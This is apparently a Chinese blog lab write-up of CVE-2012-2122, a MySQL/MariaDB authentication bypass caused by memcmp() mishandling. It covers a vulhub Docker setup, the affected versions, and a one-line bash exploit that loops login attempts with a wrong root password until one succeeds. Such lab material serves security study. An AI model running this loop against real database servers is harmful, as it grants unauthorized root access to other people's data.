热门标签
热门文章
- 1Stable Diffusion绘画 | 图生图-局部重绘(一)
- 2双向链表C++,C#,Java版,这些程序大多已经过测试,一直在用。
- 3【C++入门(上)】—— 我与C++的不解之缘(一)
- 4数据结构之链表与Java中的LinkedList
- 5mysql插入数据量过大报错解决办法_the length of param 5 is larger than 80000,please
- 6postgresql 您要的日期查询都在这_pg获取前一天日期
- 7汇编语言:多位数输入输出&循环设计实验
- 8软件测试面试题:什么是α测试,β测试?_软件工程α测试
- 9解决IDEA使用卡顿的问题,设置JVM内存大小和清理缓存
- 104- 业务架构师眼中的需求是什么?_业务需求三要素
当前位置: article > 正文
CVE 2012-2122_cve2012-2122
作者:喵喵爱编程 | 2024-08-17 22:52:49
赞
踩
cve2012-2122
漏洞简介:
出现在mysql/mariaDb上的一个身份绕过漏洞,在客户端进行身份验证时输入值会与验证密码对比由于menmcmo()得的不正确处理导致用户在密码错误是也可以成功登录。因为memcmp()在处理时会返回-128~127的有符号值(即256种情况),但是当用户再使用某些不安全的优化时会导致函数可能返回超出此范围的数值,进而导致即便用户输入的错误密码也会成功登录(账户名正确);因为身份验证时回生成不同的哈希值,因此使用一个密码成功登录的几率为1/256.
实验中我们使用exp在对应版本上的服务进行登陆时,即便密码错误也能成功以root用户登录。
搭建环境
- vulhub环境
- kali攻击机 :
- ubuntu 搭建docker环境
适用版本
-
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
-
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
漏洞EXP:
for i in `seq 1 1000`;do mysql -uroot -pwrong -hlocalhost -P3306;done
- 1
进入漏洞目录下启动环境:
#docker-compose up -d 启动容器并放入后台运行
#docker-compose ps 查看当前与运行的容器实例
在kali上运行exp,成功登录拿到mysql的交互shell
查看一下当前连接用户:select current_user();
本文内容由网友自发贡献,转载请注明出处:https://www.wpsshop.cn/w/喵喵爱编程/article/detail/994729
推荐阅读
相关标签
